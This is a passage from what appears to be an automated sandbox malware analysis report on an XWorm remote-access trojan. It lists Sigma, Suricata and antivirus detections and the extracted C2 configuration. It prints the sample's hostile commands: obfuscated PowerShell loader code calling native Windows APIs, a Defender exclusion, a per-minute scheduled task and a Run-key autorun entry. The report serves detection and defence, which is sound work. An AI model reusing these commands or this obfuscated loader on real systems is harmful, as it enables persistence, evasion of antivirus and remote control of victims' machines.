+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[
                          Sigma detected: Potential WinAPI Calls Via CommandLine
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Sigma detected: Script Interpreter Execution From Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Sigma detected: Suspicious Program Location with Network Connections
                          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\DeadROOTkit.exe, Initiated: true, ProcessId: 5804, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\DeadROOTkit.exe" , ParentImage: C:\Users\Public\DeadROOTkit.exe, ParentProcessId: 5804, ParentProcessName: DeadROOTkit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe', ProcessId: 7176, ProcessName: powershell.exe
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 5324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe
                          Sigma detected: Uncommon Svchost Parent Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6968, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[

                          Persistence and Installation Behavior

                          barindex
                          Sigma detected: Schedule system process
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 5324, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7244, ProcessName: schtasks.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-13T19:15:49.657430+020028536851A Network Trojan was detected192.168.2.449739149.154.167.220443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-13T19:15:38.561396+020028559241Malware Command and Control Activity Detected192.168.2.449738147.185.221.2128600TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: mIURiU8n2P.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Source: C:\Users\Public\DeadXClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                          Source: C:\Users\Public\DeadCodeRootKit.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                          Source: C:\Users\Public\Deadsvchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                          Source: C:\Users\Public\DeadROOTkit.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Found malware configuration
                          Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["subscribe-bond.gl.at.ply.gg"], "Port": "28600", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                          Multi AV Scanner detection for domain / URL
                          Source: subscribe-bond.gl.at.ply.ggVirustotal: Detection: 8%Perma Link
                          Source: subscribe-bond.gl.at.ply.ggVirustotal: Detection: 8%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\Public\DeadCodeRootKit.exeReversingLabs: Detection: 91%
                          Source: C:\Users\Public\DeadCodeRootKit.exeVirustotal: Detection: 81%Perma Link
                          Source: C:\Users\Public\DeadROOTkit.exeReversingLabs: Detection: 87%
                          Source: C:\Users\Public\DeadROOTkit.exeVirustotal: Detection: 64%Perma Link
                          Source: C:\Users\Public\DeadXClient.exeReversingLabs: Detection: 95%
                          Source: C:\Users\Public\DeadXClient.exeVirustotal: Detection: 71%Perma Link
                          Source: C:\Users\Public\Deadsvchost.exeReversingLabs: Detection: 95%
                          Source: C:\Users\Public\Deadsvchost.exeVirustotal: Detection: 71%Perma Link
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exeVirustotal: Detection: 64%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: mIURiU8n2P.exeReversingLabs: Detection: 73%
                          Source: mIURiU8n2P.exeVirustotal: Detection: 67%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\DeadROOTkit.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\DeadXClient.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\DeadCodeRootKit.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\Deadsvchost.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\DeadROOTkit.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: mIURiU8n2P.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: updates-full.gl.at.ply.gg
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: 60075
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: <123456789>
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: <Xwormmm>
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: USB.exe
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: BTC_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: ETH_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: TRC20_Address
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: Your_Token
                          Source: 2.0.DeadROOTkit.exe.1a0000.0.unpackString decryptor: Your_ID
                          Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 3_2_00B01000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_00B01000
                          Source: mIURiU8n2P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: mIURiU8n2P.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
